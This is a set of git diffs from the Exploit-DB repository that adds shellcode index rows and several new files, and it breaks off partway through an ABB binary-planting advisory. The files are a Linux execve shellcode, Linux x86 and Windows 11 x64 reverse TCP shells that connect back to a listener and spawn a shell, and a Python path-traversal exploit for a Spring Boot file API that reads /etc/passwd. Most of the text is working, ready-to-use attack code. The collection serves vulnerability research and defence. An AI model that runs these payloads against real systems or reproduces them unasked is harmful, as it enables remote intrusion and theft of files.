Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe, 1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,, 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 92132dd6a..31bb8753d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php +52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,, 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,, 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php @@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,, 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,, +52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,, 51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,, 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,, 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,, @@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,, 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,, 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php +52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,, 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,, 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,, 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,, diff --git a/shellcodes/linux_x86-64/52296.asm b/shellcodes/linux_x86-64/52296.asm new file mode 100644 index 000000000..ba66da680 --- /dev/null +++ b/shellcodes/linux_x86-64/52296.asm @@ -0,0 +1,31 @@ +# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes) +# Date: 2025-03-23 +# Exploit Author: Sayan Ray [@barebones90] +# Tested on: Linux x86-64 +# CVE: N/A + +; P0P SH311 execve ("/bin/sh", NULL, NULL) + +GLOBAL _start + +section .text + +_start: + xor rax, rax + push rax + + mov r10, 0x68732f6e69622f ; hs/nib/ + push r10 + + mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack + ; ( const char *pathname ) + + ; Calling execve + mov rax, 0x3b ; 59 [execve syscall] + mov rsi, 0 ; NULL ( char *const _Nullable argv[] ) + mov rdx, 0 ; NULL ( char *const _Nullable envp[] ) + syscall + +; Shellcode: +; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05 +; [Length] : 36 \ No newline at end of file diff --git a/shellcodes/linux_x86/52297.c b/shellcodes/linux_x86/52297.c new file mode 100644 index 000000000..2b02b3a2b --- /dev/null +++ b/shellcodes/linux_x86/52297.c @@ -0,0 +1,43 @@ +/* +# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes) +# Date: 2025-04-06 +# Exploit Author: Al Baradi Joy +# Platform: Linux x86 +# Type: Shellcode +# Shellcode Length: 95 bytes +# Tested On: Kali Linux x86 +# Connect-Back IP: 192.168.1.100 +# Connect-Back Port: 4444 + +Description: +This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell. + +Usage: +Start a netcat listener on your attacking machine: + nc -lvnp 4444 + +Compile and run on the target machine: + gcc -fno-stack-protector -z execstack shellcode.c -o shellcode + ./shellcode +*/ + +#include +#include + +unsigned char shellcode[] = +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers +"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall +"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100 +"\x66\x68\x11\x5c" // push port 4444 +"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56" +"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect +"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop +"\xcd\x80\x49\x79\xf9" +"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" +"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh") + +int main() { + printf("Shellcode Length: %zu\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file diff --git a/shellcodes/windows_x86-64/52298.py b/shellcodes/windows_x86-64/52298.py new file mode 100755 index 000000000..2c89e85bb --- /dev/null +++ b/shellcodes/windows_x86-64/52298.py @@ -0,0 +1,335 @@ +#!/usr/bin/python +# +# Description: Windows 11 x64 Reverse TCP Shell +# Architecture: x64 +# OS: Microsoft Windows +# Author: hvictor (Victor Huerlimann) +# Shellcode Size: 564 bytes +# Repository:https://github.com/hvictor/shellcode-x64 +# +# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle +# +# Note: You will have to modify the line 193 of this file according to the attacker's IP and port: +# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] +# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family. + +import ctypes, struct +from ctypes import wintypes + +from keystone import * +CODE = ( +''' +start: + mov rbp, rsp + sub rsp, 1600 + +resolve_kernel32: + mov dl, 0x4b # dl = 'K' + mov rcx, 0x60 # + mov r8, gs:[rcx] # R8 = address of PEB + mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA + mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY) +search: + xor rcx, rcx + mov rbx, [rdi + 0x10] # RBX = DllBase + mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer + mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY + cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL + jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching + cmp [rsi], dl # Compare the first UNICODE char with 'K' + jne search # If the first UNICODE char is not 'K', continue searching + +find_function_jmp: + jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr + +get_find_function_addr: + pop rsi # The address of find_function is popped in RSI + mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8) + jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols + +callback: + call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack + # This is the address of find_function, and it will be popped in ESI (see get_find_function_addr). + +find_function: + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address (addr of instruction after "call find_function", see below) +# QWORD: Number of hash bytes + 8 <- RSP +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... +# QWORD: 0x0000000000000000 +#--------------------------------------------------------------------------- + + add rsp, 8 # Point RSP to (Number of hash bytes + 8) + pop rax # RAX = Number of hash bytes + 8 + push -1 # Write -1 on the stack instead of (Number of hash bytes + 8) + add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000 + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address +# QWORD: 0xffffffffffffffff +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... +# QWORD: 0x0000000000000000 <- RSP +#--------------------------------------------------------------------------- + +find_function_loop2: + xor rax, rax + xor rdi, rdi + mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew + mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress) + add rdi, rbx # RDI = VMA of the Export Directory Table of the module + mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module) + mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table) + add rax, rbx # EAX = VMA of AddressOfNames + mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else + +find_function_loop: + dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name + mov rax, [rbp - 8] # EAX = VMA of AddressOfNames + mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name + add rsi, rbx # RSI = VMA of the current Symbol Name + +compute_hash: + xor rax, rax # EAX = 0 + cdq # If the MSB of EAX = 1: EDX = 0x11111111 + # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX + # In this case, EDX = 0x00000000 because EAX = 0x00000000 + +compute_hash_repeat: + ror edx, 0xd # Right-shift EDX of 13 bits + add edx, eax # EDX += current EAX value + lodsb # Load the byte pointed by ESI into AL + test al, al # Test if the NULL terminator of the Symbol Name has been reached + jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison + # Else, perform the next iteration of the hash-computation algorithm + # At this point, EDX contains the computed hash of the current symbol + +find_function_compare: + cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol + jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames + # If ZF = 1, the hash is equal: symbol found: continue hereby + mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array + add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array + mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX) + mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array + add rdx, rbx # RDX = VMA of the AddressOfFunctions array + mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol + add rax, rbx # EAX = VMA of the wanted symbol + push rax # Push the wanted symbol's VMA onto the stack: + # ATTENTION: The symbol's VMA overwrites its Hash on the stack! + mov rax, [rsp - 8] + cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved + jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping + +find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack + sub rsp, 16 # Point RSP to the Return Address of find_function + ret # Return + +resolve_k32_sym: + mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA + push rax + mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA + push rax + mov rax, 0x0000000078b5b983 # Hash of TerminateProcess + push rax + mov rax, 32 # Push 32 onto the stack + push rax + call [rbp + 8] # Call to find_function (see find_function above) + +load_ws2_32: + mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed) + push rax + mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed) + push rax + mov rcx, rsp # Paramter 1 = address of "ws2_32.dll" + sub rsp, 40 # Create 40 bytes of room on the stack + call [rsp + 80] # Call LoadLibraryA + nop + +resolve_ws2_sym: + mov rbx, rax # RBX = Base Address of ws2_32.dll + mov rax, 0x0000000060aaf9ec # Hash of connect + push rax + mov rax, 0x00000000adf509d9 # Hash of WSASocketA + push rax + mov rax, 0x000000003bfcedcb # Hash of WSAStartup + push rax + mov rax, 32 + push rax # Push 32 (Number of Hashes pushed + 8) + call [rbp + 8] # Call find_function + + sub rsp, 512 + +call_WSAStartup: + mov rcx, 0x202 # RCX = WinSock Version 2.2 + lea rdx, [rsp + 800] # RDX = Address of output WSAData structure + call [rsp + 520] # Call WSAStartup + +call_WSASocketA: + mov rcx, 2 # Parameter af = 2 (AF_INET) + mov rdx, 1 # Parameter type = 1 + mov r8, 6 # Parameter protocol = 6 (TCP) + xor r9, r9 # Parameter lpProtocolInfo = 0 + mov [rsp + 32], r9 # Parameter dwFlags = 0 + mov [rsp + 40], r9 # Parameter g = 0 + call [rsp + 528] # Call WSASocketA + + +call_connect: + mov rsi, rax # Save socket fd in RSI + mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA + mov r8, 16 # R8 = Parameter namelen = 16 + + # Preparation of the sockaddr_in structure on the stack: + # struct sockaddr_in { + # QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)] + # QWORD: sin_zero = [00000000 00000000] + # } + mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] + lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in + mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family + xor r9, r9 + mov [rdx + 8], r9 # Write field sin_zero + call [rsp + 536] # Call connect + +# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +create_STARTUPINFOA: + lea rdi, [rsp + 800] + add rdi, 0x300 + mov rbx, rdi + xor eax, eax + mov ecx, 0x20 + rep stosd # Zero-out 0x80 bytes + mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68 + mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO) + mov eax, 0x100 # EAX = STARTF_USESTDHANDLES + mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES + mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd + mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd + mov [rbx + 0x60], rsi # Field lpStartupInfo.hStdError = socket fd + +# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +call_CreateProccessA: + xor rax, rax + xor rcx, rcx # Parameter lpApplicationName = 0 + lea rdx, [rsp + 800] # Parameter lpCommandLine + add rdx, 0x180 + mov eax, 0x646d63 # EAX = "cmd" + mov [rdx], rax # Write "cmd" in the lpCommandLine parameter + xor r8, r8 # Parameter lpProcessAttributes = 0 + xor r9, r9 # Parameter lpThreadAttributes = 0 + xor rax, rax + inc eax + mov [rsp + 0x20], rax # Parameter bInheritHandles = 1 + dec eax + mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0 + mov [rsp + 0x30], rax # Parameter lpEnvironment = 0 + mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0 + mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO + add rbx, 0x68 + mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO + call [rsp + 616] + +call_TerminateProcess: + xor rcx, rcx + dec rcx # Parameter hProcess = -1 = this process + xor rdx, rdx # Parameter uExitCode = 0 (graceful termination) + int3 + call [rsp + 608] # Call TerminateProcess +''' +) + + +# Initialize engine in 64-bit mode +ks = Ks(KS_ARCH_X86, KS_MODE_64) +encoding, count = ks.asm(CODE) +instructions = "" +for dec in encoding: + instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n") + +print("Opcodes = (\"" + instructions + "\")") +print(f"Size: {len(encoding)} bytes.") + +# E + +# Preparation of WSAStartup (not included in the shellcode) +# Define necessary structures and constants +class WSADATA(ctypes.Structure): + _fields_ = [ + ("wVersion", wintypes.WORD), + ("wHighVersion", wintypes.WORD), + ("szDescription", wintypes.CHAR * 257), + ("szSystemStatus", wintypes.CHAR * 129), + ("iMaxSockets", wintypes.UINT), + ("iMaxUdpDg", wintypes.UINT), + ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)) + ] + +# Load the Winsock library +ws2_32 = ctypes.windll.ws2_32 + +# Define the WSAStartup function prototype +# WSAStartup takes two arguments: +# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2) +# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation +ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)] +ws2_32.WSAStartup.restype = wintypes.INT + +def call_wsastartup(): + # Request version 2.2 (0x0202) + version_requested = 0x0202 + + # Create an instance of WSADATA to hold the output + wsadata = WSADATA() + + # Call WSAStartup + result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata)) + + if result != 0: + raise RuntimeError(f"WSAStartup failed with error code {result}") + + print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}") + return wsadata + +call_wsastartup() + +sh = b"" +for e in encoding: + sh += struct.pack("B", e) +shellcode = bytearray(sh) + +# Alloco memoria eseguibile per lo shellcode +ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000, + ctypes.c_int(len(shellcode)), + ctypes.c_int(0x3000), + ctypes.c_int(0x40)) + +# Metto lo shellcode nel buffer `buf` +buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) + +# Copio lo shellcode nella memoria allocata +ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), + buf, + ctypes.c_int(len(shellcode))) + +print("Shellcode: Short Reverse Shell") +print("Shellcode address = %s" % hex(ptr)) +input("\n[?] Press Enter to execute the shellcode: ") + +# Eseguo lo shellcode in un nuovo thread, su cui faccio la join +ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), + ctypes.c_int(0), + ctypes.c_int(ptr), + ctypes.c_int(0), + ctypes.c_int(0), + ctypes.pointer(ctypes.c_int(0))) + +ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1)) \ No newline at end of file From d69eaacef80e5091a4524d76233f7841067029c7 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Mon, 26 May 2025 00:16:29 +0000 Subject: [PATCH 4/6] DB: 2025-05-26 8 changes to exploits/shellcodes/ghdb Java-springboot-codebase 1.1 - Arbitrary File Read ABB Cylon Aspect Studio 3.08.03 - Binary Planting ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Microsoft Windows Server 2016 - Win32k Elevation of Privilege Windows 2024.15 - Unauthenticated Desktop Screenshot Capture --- exploits/java/webapps/52304.py | 57 +++ exploits/multiple/local/52306.txt | 111 +++++ exploits/multiple/remote/52303.py | 247 ++++++++++++ exploits/multiple/remote/52305.py | 281 +++++++++++++ exploits/multiple/webapps/52302.py | 65 +++ exploits/windows/local/52301.c | 623 +++++++++++++++++++++++++++++ exploits/windows/remote/52300.py | 61 +++ files_exploits.csv | 7 + 8 files changed, 1452 insertions(+) create mode 100755 exploits/java/webapps/52304.py create mode 100644 exploits/multiple/local/52306.txt create mode 100755 exploits/multiple/remote/52303.py create mode 100755 exploits/multiple/remote/52305.py create mode 100755 exploits/multiple/webapps/52302.py create mode 100644 exploits/windows/local/52301.c create mode 100755 exploits/windows/remote/52300.py diff --git a/exploits/java/webapps/52304.py b/exploits/java/webapps/52304.py new file mode 100755 index 000000000..f60cbd628 --- /dev/null +++ b/exploits/java/webapps/52304.py @@ -0,0 +1,57 @@ +# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read +# Google Dork: +# Date: 23/May/2025 +# Exploit Author: d3sca +# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase +# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase +# Version: [app version] 1.1 +# Tested on: Debian Linux +# CVE : CVE-2025-46822 + +#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd + +import argparse +import requests + +from urllib.parse import quote +def exploit(target, file_path, output=None): + # Ensure the file path is absolute + if not file_path.startswith('/'): + print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.") + file_path = '/' + file_path.lstrip('/') + + # URL-encode the file path + encoded_path = quote(file_path, safe='') + + # Construct the target URL + endpoint = f"/api/v1/files/{encoded_path}" + url = target.rstrip('/') + endpoint + print(f"[*] Attempting to retrieve: {file_path}") + print(f"[*] Sending request to: {url}") + try: + response = requests.get(url, allow_redirects=False, timeout=10) + + if response.status_code == 200: + print("[+] File retrieved successfully!") + if output: + with open(output, 'wb') as f: + f.write(response.content) + print(f"[+] Content saved to: {output}") + else: + print("\nFile contents:") + print(response.text) + else: + print(f"[-] Failed to retrieve file. Status code: {response.status_code}") + print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response + except Exception as e: + print(f"[-] An error occurred: {str(e)}") + +if name == "main": + parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API") + parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)") + parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)") + parser.add_argument("-o", "--output", help="Output file to save contents") + + args = parser.parse_args() + + exploit(args.target, args.file_path, args.output) \ No newline at end of file diff --git a/exploits/multiple/local/52306.txt b/exploits/multiple/local/52306.txt new file mode 100644 index 000000000..d998d9558 --- /dev/null +++ b/exploits/multiple/local/52306.txt @@ -0,0 +1,111 @@ +# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: <=3.08.03 +# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience + +# Advisory ID: ZSL-2025-5952 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php + +# CVE ID: CVE-2024-13946 +# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946 + +C:\> type project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll +C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat +REM 64bit parameters +jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + +C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat + +C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters + +C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + + +C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class 